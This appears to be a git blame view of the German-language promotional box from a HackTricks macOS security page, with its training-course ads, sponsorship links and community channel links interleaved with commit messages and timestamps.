Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2024-07-19 11:30:53 +00:00
{% hint style="success" %}
Lernen & üben Sie AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Lernen & üben Sie GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
Ad hacktricks sponsoring
2022-04-28 16:01:33 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2024-07-19 11:30:53 +00:00
<details>
Ad hacktricks sponsoring
2022-04-28 16:01:33 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2024-07-19 11:30:53 +00:00
<summary>Unterstützen Sie HackTricks</summary>
arte
2024-01-03 10:42:55 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2024-07-19 11:30:53 +00:00
* Überprüfen Sie die [**Abonnementpläne**](https://github.com/sponsors/carlospolop)!
* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Teilen Sie Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-Repos senden.
Ad hacktricks sponsoring
2022-04-28 16:01:33 +00:00
</details>
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac
2024-07-19 11:30:53 +00:00
{% endhint %}
Reference in a new issue Copy permalink